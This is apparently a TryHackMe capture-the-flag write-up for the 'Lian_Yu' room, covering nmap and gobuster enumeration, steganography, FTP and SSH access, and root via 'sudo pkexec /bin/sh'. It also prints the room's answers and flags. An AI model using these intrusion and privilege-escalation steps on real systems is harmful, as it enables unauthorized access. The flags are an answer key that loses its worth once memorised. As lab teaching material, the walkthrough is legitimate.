Lian_Yu

Task 1 - Deploy the machine

🎯 Target IP: 10.10.95.230

Create a directory for machine on the Desktop and a directory containing the scans with nmap.

Task 2 - Reconnaissance

su
echo "10.10.95.230 lian_yu.thm" >> /etc/hosts

mkdir thm/lian_yu
cd thm/lian_yu
mkdir {nmap,content,exploits,scripts}

# At the end of the room
# To clean up the last line from the /etc/hosts file
sed -i '$ d' /etc/hosts

I prefer to start recon by pinging the target, this allows us to check connectivity and get OS info.

ping -c 3 lian_yu.thm
PING lian_yu.thm (10.10.95.230) 56(84) bytes of data.
64 bytes from lian_yu.thm (10.10.95.230): icmp_seq=1 ttl=63 time=66.7 ms
64 bytes from lian_yu.thm (10.10.95.230): icmp_seq=2 ttl=63 time=62.1 ms
64 bytes from lian_yu.thm (10.10.95.230): icmp_seq=3 ttl=63 time=62.6 ms

Sending these three ICMP packets, we see that the Time To Live (TTL) is ~64 secs. this indicates that the target is a *nix, while Windows systems usually have a TTL of 128 secs.

Of course, start to check information scanning open ports:

nmap --open -p0- -n -Pn -vvv --min-rate 5000 lian_yu.thm -oG nmap/port_scan

PORT      STATE SERVICE REASON
21/tcp    open  ftp     syn-ack ttl 63
22/tcp    open  ssh     syn-ack ttl 63
80/tcp    open  http    syn-ack ttl 63
111/tcp   open  rpcbind syn-ack ttl 63
52286/tcp open  unknown syn-ack ttl 63

command	result
sudo	run as root
sC	run default scripts
sV	enumerate versions
A	aggressive mode
T4	run a bit faster
oN	output to file with nmap formatting

command

result

sudo

run as root

run default scripts

enumerate versions

aggressive mode

run a bit faster

output to file with nmap formatting

It looks like there are 5 open ports on the machine: 21,22,80,111,52286.

Now, we need to search which services are running on open ports:

nmap -p21,22,80,111,52286 -n -Pn -vvv -sCV --min-rate 5000 lian_yu.thm -oN nmap/open_port

PORT      STATE SERVICE REASON         VERSION
21/tcp    open  ftp     syn-ack ttl 63 vsftpd 3.0.2
22/tcp    open  ssh     syn-ack ttl 63 OpenSSH 6.7p1 Debian 5+deb8u8 (protocol 2.0)
| ssh-hostkey: 
|   1024 56:50:bd:11:ef:d4:ac:56:32:c3:ee:73:3e:de:87:f4 (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBAOZ67Cx0AtDwHfVa7iZw6O6htGa3GHwfRFSIUYW64PLpGRAdQ734COrod9T+pyjAdKscqLbUAM7xhSFpHFFGM7NuOwV+d35X8CTUM882eJX+t3vhEg9d7ckCzNuPnQSpeUpLuistGpaP0HqWTYjEncvDC0XMYByf7gbqWWU2pe9HAAAAFQDWZIJ944u1Lf3PqYCVsW48Gm9qCQAAAIBfWJeKF4FWRqZzPzquCMl6Zs/y8od6NhVfJyWfi8APYVzR0FR05YCdS2OY4C54/tI5s6i4Tfpah2k+fnkLzX74fONcAEqseZDOffn5bxS+nJtCWpahpMdkDzz692P6ffDjlSDLNAPn0mrJuUxBFw52Rv+hNBPR7SKclKOiZ86HnQAAAIAfWtiPHue0Q0J7pZbLeO8wZ9XNoxgSEPSNeTNixRorlfZBdclDDJcNfYkLXyvQEKq08S1rZ6eTqeWOD4zGLq9i1A+HxIfuxwoYp0zPodj3Hz0WwsIB2UzpyO4O0HiU6rvQbWnKmUaH2HbGtqJhYuPr76XxZtwK4qAeFKwyo87kzg==
|   2048 39:6f:3a:9c:b6:2d:ad:0c:d8:6d:be:77:13:07:25:d6 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDRbgwcqyXJ24ulmT32kAKmPww+oXR6ZxoLeKrtdmyoRfhPTpCXdocoj0SqjsETI8H0pR0OVDQDMP6lnrL8zj2u1yFdp5/bDtgOnzfd+70Rul+G7Ch0uzextmZh7756/VrqKn+rdEVWTqqRkoUmI0T4eWxrOdN2vzERcvobqKP7BDUm/YiietIEK4VmRM84k9ebCyP67d7PSRCGVHS218Z56Z+EfuCAfvMe0hxtrbHlb+VYr1ACjUmGIPHyNeDf2430rgu5KdoeVrykrbn8J64c5wRZST7IHWoygv5j9ini+VzDhXal1H7l/HkQJKw9NSUJXOtLjWKlU4l+/xEkXPxZ
|   256 a6:69:96:d7:6d:61:27:96:7e:bb:9f:83:60:1b:52:12 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPfrP3xY5XGfIk2+e/xpHMTfLRyEjlDPMbA5FLuasDzVbI91sFHWxwY6fRD53n1eRITPYS1J6cBf+QRtxvjnqRg=
|   256 3f:43:76:75:a8:5a:a6:cd:33:b0:66:42:04:91:fe:a0 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDexCVa97Otgeg9fCD4RSvrNyB8JhRKfzBrzUMe3E/Fn
80/tcp    open  http    syn-ack ttl 63 Apache httpd
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Purgatory
|_http-server-header: Apache
111/tcp   open  rpcbind syn-ack ttl 63 2-4 (RPC #100000)
|_rpcinfo: ERROR: Script execution failed (use -d to debug)
52286/tcp open  status  syn-ack ttl 63 1 (RPC #100024)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Task 3 - Find the flags

3.1 What is the Web Directory you found?

Then we can start to see website (port 80):

We find this info in the footer of website:

Note: Hi Everyone, I am a huge fan to Arrowverse, I built this vm concept based on Arrow (first season) you will find a few things similar here and I posted this Content here just to entertain you, To complete this CTF it isn't mandatory to have knowledge on Arrrowverse series. I hope you will Enjoy the content and have fun :).

We continue exploring web source code to find eventual information disclosure.

No other informations, another good thing to do, is find hidden paths on website using gobuster

gobuster dir -u lian_yu.thm -w /usr/share/wordlists/dirb/common.txt

Very bad, we find only index page that we've just see.

We can try to use a bigger wordlist such as directory-list-2.3-medium.txt

gobuster dir -u lian_yu.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Excellent! We find a new web path: /island, search it!

Note this code word: vigilante.

We can try to retake another dirbuster search starting with island/ web path:

gobuster dir -u lian_yu.thm/island/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Then, we can answer at first question.

2100

3.2 What is the file name you found?

Explore /2100 web page:

Viewing source code:

we see this info:

you can avail your .ticket here but how?

Retaking another dirbuster search starting with 2100/ web path, we see that there're nothing, then we can try to custom dirbuster search using .ticket extension:

gobuster dir -u lian_yu.thm/island/2100/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .ticket

Wow, we've the path to the ticket which is the answer to this question as well.

green_arrow.ticket

3.3 - What is the FTP Password?

Open it we see this potential encrypted word, then we can use CyberChef to decrypt it.

CyberChef

After multiple trial and error attempts, we can determine that this is a Base58 encoding.

Remember that we've a potential username: 'vigilante', then we try to login with ftp:

Download these resources using mget * command.

There're three images with potential hidden info inside.

The 'Leave_me_alone.png' image is corrupt, seeing header we see that's not '.png':

xxd Leave_me_alone.png | head

then we can modify it using hexeditor and display it, getting information about psw:

hexeditor Leave_me_alone.png

Perfect, we can try to extract info using steghide tool and psw retrevied few time ago:

steghide extract -sf aa.jpg

unzip ss.zip
#we find two files

The content of shado file can be more interesting!

!#th3h00d

3.4 - What is the file name with SSH password?

Trying the same FTP credentials we can't access with SSH.

Then, we've try to use the same username and brute force psw using Hydra, but it doesn't work.

First to brute force user and psw, we can try to re-access with FTP and check home folder of system users:

Very good, we find another user: slade, and probably ssh psw matched into shado file (M3tahuman).

Try it!

ssh slade@10.10.244.228

Well done!

shado

3.5 - Find user.txt flag

Using find command we can search quickly user flag and open it with cat:

find / -type f -iname "user.txt" 2>/dev/null

🚩User Flag (user.txt)

THM{P30P7E_K33P_53CRET5__C0MPUT3R5_D0N'T}

3.5 - Find root.txt flag

We can do sudo -l command to discover user's permissions.

Very good pkexec has root permission!

Search on GTFOBins (https://gtfobins.github.io/) and find our exploit:

Run it to became root and find flag (how the last task):

sudo pkexec /bin/sh #privilege escalation

/bin/bash -i #spawn shell
find / -type f -iname "root.txt" 2>/dev/null #find root flag
cat /root/root.txt #see root.txt

🚩 Root Flag (root.txt)

THM{MY_W0RD_I5_MY_B0ND_IF_I_ACC3PT_YOUR_CONTRACT_THEN_IT_WILL_BE_COMPL3TED_OR_I'LL_BE_D34D}

PreviousWgel NextBlog

Last updated 10 months ago